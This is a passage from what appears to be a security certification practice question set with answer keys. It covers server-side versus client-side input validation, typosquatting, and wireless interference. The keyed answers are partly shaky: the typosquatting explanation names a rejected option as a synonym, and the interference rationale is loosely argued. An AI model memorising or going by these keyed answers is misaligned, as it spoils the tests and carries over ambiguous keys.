D. The integrity of the data is at risk. Avoid placing the validation procedures only on the client side. All input should be validated server side. Client-side validation is executed by the client and can be easily bypassed. Client-side validation is a major design problem when it appears in web applications. It places trust in the browser, an entity that should never be trusted. If your application accepts input from the client, always validate for length, range and type on the server. Client-side validation should only be used to improve user experience, never for security purposes. A client-side input validation check can improve application performance by catching malformed input on the client and, therefore, saving a roundtrip to the server. However, client side validation can be easily bypassed and should never be used for security purposes. Always use server-side validation to protect your application from malicious attacks. Never trust the browser. Because the browser is running on the user's machine, it can be fully controlled by the user. Therefore, any client side validation code can be controlled and bypassed by an attacker. Use JavaScript only to enhance your pages. JavaScript is useful for enhancing your application's presentation. However, it has no mechanism to protect the integrity of its code. Do not rely on JavaScript to enforce security decisions
Before an infection was detected, several of the infected devices attempted to access a URL that was similar to the company name but with two letters transported. Which of the following BEST describes the attack vector used to infect the devices? A. Cross-site scripting B. URL hijacking C. DNS poisoning D. Typo squatting
D. Typo squatting Typosquatting, also known as URL hijacking, is a form of cybersquatting (sitting on sites under someone else's brand or copyright) that targets Internet users who incorrectly type a website address into their web browser (e.g., "Gooogle.com" instead of "Google.com").
An attack that is using interference as its main attack to impede network traffic is which of the following? A. Introducing too much data to a targets memory allocation B. Inundating a target system with SYN requests C. Utilizing a previously unknown security flaw against the target D. Using a similar wireless configuration of a nearby network
D. Using a similar wireless configuration of a nearby network Wireless interference means disruption of one's network. This is a very big challenge especially owing to the fact that wireless signals will always be disrupted. Such interference can be created by a Bluetooth headset, a microwave oven, a cordless phone or using a similar wireless configuration of a nearby network. This makes transmission and receiving of wireless signals very difficult. Wireless interference can also be caused by causing service degradation to make sure that one denies complete access to a particular service. Jamming can also be used in conjunction with an evil twin
